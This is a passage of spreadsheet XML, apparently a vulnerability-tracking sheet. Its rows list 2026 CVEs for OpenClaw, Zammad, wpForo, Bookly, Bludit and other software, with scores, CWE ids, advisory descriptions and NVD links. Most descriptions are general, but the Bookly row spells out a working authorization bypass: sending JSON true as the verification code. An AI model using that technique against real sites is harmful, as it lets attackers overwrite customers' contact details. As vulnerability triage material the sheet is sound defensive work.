      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100571</t>
        </is>
      </c>
      <c r="D207" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E207" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="inlineStr"/>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr">
        <is>
          <t>tempo, npm, requests, rust</t>
        </is>
      </c>
      <c r="K207" s="5" t="inlineStr"/>
      <c r="L207" s="5" t="inlineStr"/>
      <c r="M207" s="5" t="inlineStr"/>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q207" s="5" t="inlineStr"/>
      <c r="R207" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S207" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') versions &gt;= 2026.6.6 and &lt; 2026.8.1 apply the SMS webhook invalid-request rate limit before Twilio signature verification and identify clients only by the raw proxy socket address. In deployments where the SMS/Twilio webhook sits behind a trusted reverse proxy or tunnel so that multiple external clients share one socket address, an unauthenticated remote sender can exhaust the shared pre-authentication rate-limit budget with invalid requests, causing subsequent correctly signed Twilio callbacks to receive HTTP 429 responses. The result is temporary inbound SMS loss while the shared window remains exhausted; the attacker cannot forge a callback or access message data. Fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100571</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100572</t>
        </is>
      </c>
      <c r="D208" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="inlineStr"/>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr">
        <is>
          <t>tempo, rust</t>
        </is>
      </c>
      <c r="K208" s="5" t="inlineStr"/>
      <c r="L208" s="5" t="inlineStr"/>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q208" s="5" t="inlineStr"/>
      <c r="R208" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S208" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions &gt;= 2026.3.25 and &lt; 2026.8.1 apply invalid-token rate limiting for Synology Chat webhooks before authentication and key the limit on the raw proxy socket address. In deployments where OpenClaw sits behind a trusted reverse proxy or tunnel and multiple external clients share a single socket address, an unauthenticated sender can exhaust the shared invalid-token budget, causing subsequent legitimate Synology Chat webhook callbacks to be rejected until the rate-limit window expires. The attacker cannot obtain a valid token or read message data; the impact is temporary loss of channel availability. Fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100572</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56728</t>
        </is>
      </c>
      <c r="D209" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="inlineStr"/>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K209" s="5" t="inlineStr"/>
      <c r="L209" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q209" s="5" t="inlineStr"/>
      <c r="R209" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-639</t>
        </is>
      </c>
      <c r="S209" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, a broken access control vulnerability exists in Zammad's GraphQL API. An authenticated user can access taskbar item data belonging to another user by crafting a request with the target user's taskbar identifier. The taskbar feature stores transient state for active user sessions, including auto-saved ticket drafts. Under certain conditions, the authorization check for taskbar item access is not enforced, allowing a user to read another user's taskbar item data. This vulnerability is fixed in 7.0.2.</t>
        </is>
      </c>
      <c r="T209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56728</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56732</t>
        </is>
      </c>
      <c r="D210" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E210" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F210" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="inlineStr"/>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K210" s="5" t="inlineStr"/>
      <c r="L210" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q210" s="5" t="inlineStr"/>
      <c r="R210" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-352</t>
        </is>
      </c>
      <c r="S210" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, vulnerability in Zammad's HTML sanitization allows injection of specific HTML elements into ticket bodies. When another user views the crafted ticket, the injected element can trigger a logout request, terminating the viewer's session. This vulnerability is fixed in 7.0.2.</t>
        </is>
      </c>
      <c r="T210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56732</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56735</t>
        </is>
      </c>
      <c r="D211" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E211" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F211" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="inlineStr"/>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K211" s="5" t="inlineStr"/>
      <c r="L211" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q211" s="5" t="inlineStr"/>
      <c r="R211" s="5" t="inlineStr">
        <is>
          <t>CWE-82</t>
        </is>
      </c>
      <c r="S211" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2 and 7.1.0, zammad's HTML sanitizer (HtmlSanitizer::Strict) blocks external URLs in  to prevent remote content loading, but the srcset attribute, also allowlisted for , is not subject to the same check. This oversight allows an attacker to embed arbitrary external URLs in the srcset attribute just by sending an e-mail, effectively bypassing the external content protection. When an agent views the ticket containing the malicious srcset, the browser will silently load the attacker-controlled URL, resulting in the leakage of the agent's IP address, User-Agent, Referer, and the exact time the ticket was viewed. HtmlSanitizer::Strict got extended to block external URLs in the srcset attribute of  tags. This was done to prevent tracking pixels and external content loading, which could compromise user privacy. This issue is fixed in versions 7.0.2 and 7.1.0.</t>
        </is>
      </c>
      <c r="T211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56735</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61855</t>
        </is>
      </c>
      <c r="D212" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="inlineStr"/>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K212" s="5" t="inlineStr"/>
      <c r="L212" s="5" t="inlineStr"/>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q212" s="5" t="inlineStr"/>
      <c r="R212" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S212" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. In 7.0.3 and 7.1.1, under certain conditions, Zammad's verification of inbound PGP-signed email can mark a message as carrying a valid ("Good") PGP signature from a registered sender key, even though the displayed message content is not actually covered by that signature. As a result, the inbound article may be stored with a successful signature status that does not reflect the authenticity of the shown content. This can mislead agents who rely on the signature indicator when assessing the trustworthiness of incoming mail. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61855</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63006</t>
        </is>
      </c>
      <c r="D213" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E213" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F213" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="inlineStr"/>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K213" s="5" t="inlineStr"/>
      <c r="L213" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q213" s="5" t="inlineStr"/>
      <c r="R213" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S213" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, attacker-controlled HTML in inbound emails or tickets could bypass the image URL sanitizer using path traversal sequences. When an authenticated agent views the content, the browser resolves the URL to a protected API endpoint and sends the request with the agent's session cookie, enabling side effects such as forced logout without any user interaction. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63006</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80514</t>
        </is>
      </c>
      <c r="D214" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E214" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F214" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K214" s="5" t="inlineStr"/>
      <c r="L214" s="5" t="inlineStr"/>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q214" s="5" t="inlineStr"/>
      <c r="R214" s="5" t="inlineStr">
        <is>
          <t>CWE-348</t>
        </is>
      </c>
      <c r="S214" s="5" t="inlineStr">
        <is>
          <t>The wpForo Forum WordPress plugin from 3.0.0 before 3.1.6 does not verify the source of client-supplied IP address headers before using them to key its per-visitor rate limit on paid AI requests, allowing unauthenticated attackers to bypass the limit by spoofing the header and exhaust the site owner's metered AI credits.</t>
        </is>
      </c>
      <c r="T214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80514</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84460</t>
        </is>
      </c>
      <c r="D215" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="inlineStr"/>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K215" s="5" t="inlineStr"/>
      <c r="L215" s="5" t="inlineStr"/>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q215" s="5" t="inlineStr"/>
      <c r="R215" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S215" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, any authenticated user can call the REST endpoint for getting a tag list and receive the tag names for the given ticket, regardless of whether they have access to that ticket. Tags are an internal categorization feature and may contain sensitive labels. Ticket IDs are sequential integers, making bulk enumeration straightforward. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84460</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85290</t>
        </is>
      </c>
      <c r="D216" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="inlineStr"/>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K216" s="5" t="inlineStr"/>
      <c r="L216" s="5" t="inlineStr"/>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q216" s="5" t="inlineStr"/>
      <c r="R216" s="5" t="inlineStr">
        <is>
          <t>CWE-117</t>
        </is>
      </c>
      <c r="S216" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane's Cron::recur() method writes an invalid cron key from the URL path directly to the application log without neutralizing CRLF characters. An unauthenticated requester can place forged log lines into the audit trail by supplying a crafted cron_key value. The injected entries can corrupt forensic records and interfere with log-based monitoring. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85290</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86837</t>
        </is>
      </c>
      <c r="D217" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K217" s="5" t="inlineStr"/>
      <c r="L217" s="5" t="inlineStr"/>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q217" s="5" t="inlineStr"/>
      <c r="R217" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S217" s="5" t="inlineStr">
        <is>
          <t>The Bookly WordPress plugin before 28.3 does not properly verify a customer's identity before updating their stored details, allowing unauthenticated attackers who know a customer's primary identifier to overwrite that customer's stored personal information such as name, email and address.</t>
        </is>
      </c>
      <c r="T217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86837</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92799</t>
        </is>
      </c>
      <c r="D218" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E218" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F218" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K218" s="5" t="inlineStr"/>
      <c r="L218" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q218" s="5" t="inlineStr"/>
      <c r="R218" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="S218" s="5" t="inlineStr">
        <is>
          <t>The Online Scheduling and Appointment Booking System – Bookly plugin for WordPress is vulnerable to Authorization Bypass via PHP Type Juggling in all versions up to, and including, 28.2. This is due to the `postValidateCustomer()` function using a loose PHP inequality operator (`!=`) to compare the session-stored one-time verification code against the attacker-supplied `verification_code` parameter — a flaw that is further exposed by the booking AJAX controller registering all its methods as `wp_ajax_nopriv_` handlers and unconditionally overriding `csrfTokenValid()` to return true, leaving the endpoint both unauthenticated and CSRF-unprotected. This makes it possible for unauthenticated attackers to bypass the phone/email ownership verification step and overwrite the name, email, phone, and address fields of any arbitrary existing Bookly customer record, redirecting that customer's booking notifications to attacker-controlled contact details. The bypass is achievable because the `json_data` input channel decodes input via `json_decode()`, which preserves real PHP types and causes the `wp_kses` filter to leave non-string values such as the JSON boolean `true` untouched; submitting `true` as the `verification_code` satisfies the loose comparison against the session's non-zero integer code (generated by `mt_rand(100000, 999999)`), causing `true != &lt;non-zero int&gt;` to evaluate as `false` and the guard to be bypassed.</t>
        </is>
      </c>
      <c r="T218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92799</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93364</t>
        </is>
      </c>
      <c r="D219" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E219" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F219" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="inlineStr"/>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K219" s="5" t="inlineStr"/>
      <c r="L219" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q219" s="5" t="inlineStr"/>
      <c r="R219" s="5" t="inlineStr">
        <is>
          <t>CWE-915</t>
        </is>
      </c>
      <c r="S219" s="5" t="inlineStr">
        <is>
          <t>Bludit CMS through 3.22.0 contains a mass assignment vulnerability that allows authenticated users with the Author role to modify privileged page fields reserved for administrators by injecting reserved parameters into a content save request. Attackers can submit reserved fields such as type and username through the Pages::edit() function in bl-kernel/pages.class.php, which iterates all fields declared in dbFields without per-field authorization, enabling an Author to convert pages to static site-wide navigation entries or transfer page ownership to arbitrary accounts.</t>
        </is>
      </c>
      <c r="T219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93364</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97864</t>
        </is>
      </c>
      <c r="D220" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E220" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="inlineStr"/>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K220" s="5" t="inlineStr"/>
      <c r="L220" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q220" s="5" t="inlineStr"/>
      <c r="R220" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S220" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in GibbonEdu Gibbon up to 30.0.01. The affected element is the function makeBlock of the file modules/Planner/units_add_blockAjax.php of the component Unit Planner. The manipulation of the argument gibbonUnitBlockID/mode leads to missing authentication. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 31.0.00 is sufficient to fix this issue. The identifier of the patch is 07e719368eae8dfb4e22e19424ceab6074164ebc. It is recommended to upgrade the affected component.</t>
        </is>
      </c>
      <c r="T220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97864</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100174</t>
        </is>
      </c>
      <c r="D221" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="inlineStr"/>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K221" s="5" t="inlineStr"/>
      <c r="L221" s="5" t="inlineStr"/>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
